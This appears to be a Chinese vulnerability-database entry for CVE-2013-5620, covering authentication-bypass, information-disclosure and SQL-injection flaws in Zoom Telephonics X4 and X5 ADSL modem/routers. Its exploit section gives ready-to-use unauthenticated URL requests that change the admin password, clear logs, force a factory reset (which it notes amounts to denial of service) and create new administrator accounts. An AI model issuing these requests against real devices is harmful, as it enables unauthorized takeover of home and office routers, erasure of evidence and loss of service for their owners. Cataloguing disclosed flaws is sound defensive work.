多款Zoom Telephonics设备多个安全漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1121747 漏洞类型 其他
发布时间 2013-07-09 更新时间 2013-09-03
CVE编号 CVE-2013-5620 CNNVD-ID CNNVD-201307-225
漏洞平台 Hardware CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/38632
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201307-225
|漏洞详情
X4ADSLModem和Router、X5ADSLModem和4-portRouter都是美国ZoomTelephonics公司所开发的通信产品系列中的无线调制解调器/路由器产品。多款ZoomTelephonics设备中存在信息泄露漏洞,认证绕过漏洞和SQL注入漏洞。攻击者可利用这些漏洞获得未授权访问权限,执行任意操作,获得敏感信息,控制应用程序,访问或修改数据,或利用底层数据库中潜在的漏洞。以下产品中存在漏洞:X4ADSLModem和Router,X5ADSLModem和4-portRouter。
|漏洞EXP
source: http://www.securityfocus.com/bid/61044/info

Multiple Zoom Telephonics devices are prone to an information-disclosure vulnerability, multiple authentication bypass vulnerabilities and an SQL-injection vulnerability.

Exploiting these issues could allow an attacker to gain unauthorized access and perform arbitrary actions, obtain sensitive information, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Vulnerability proofs and examples-
All administrative items can be accessed through these two URLs

--Menu Banner
http://www.example.com/hag/pages/toc.htm

-Advanced Options Menu
http://www.example.com/hag/pages/toolbox.htm

Example commands that can be executed remotely through a web browser
URL, or a modified HTTP GET/POST requests-

-Change Password for admin Account

On Firmware 2.5 or lower
http://www.example.com/hag/emweb/PopOutUserModify.htm/FormOne&user=admin&ex_param1=
admin&new_pass1=123456&new_pass2=123456&id=3&cmdSubmit=Save+Changes

On Firmware 3.0-
http://www.example.com/hag/emweb/PopOutUserModify.htm?id=40&user=admin&Zadv=1&ex_pa
ram1=admin&new_pass1=123456&new_pass2=123456&id=3&cmdSubmit=Save+Changes

-Clear Logs
http://www.example.com/Action?id=76&cmdClear+Log=Clear+Log

-Remote Reboot to Default Factory Settings-
Warning - For all intents and purposes, this action will almost always
result in a long term Denial of Service attack.
http://www.example.com/Action?reboot_loc=1&id=5&cmdReboot=Reboot

-Create New Admin or Intermediate Account-
On Firmware 2.5 or lower
http://www.example.com/hag/emweb/PopOutUserAdd.htm?id=70&user_id="newintermediateac
count"&priv=v2&pass1="123456"&pass2="123456"&cmdSubmit=Save+Changes

On Firmware 3.0-
http://www.example.com/hag/emweb/PopOutUserAdd.htm?id=70&Zadv=1&ex_param1=adminuser
_id="newadminaccount"&priv=v1&pass1="123456"&pass2="123456"&cmdSubmit=Sa
ve+Changes
|参考资料

来源:BID
名称:61044
链接:http://www.securityfocus.com/bid/61044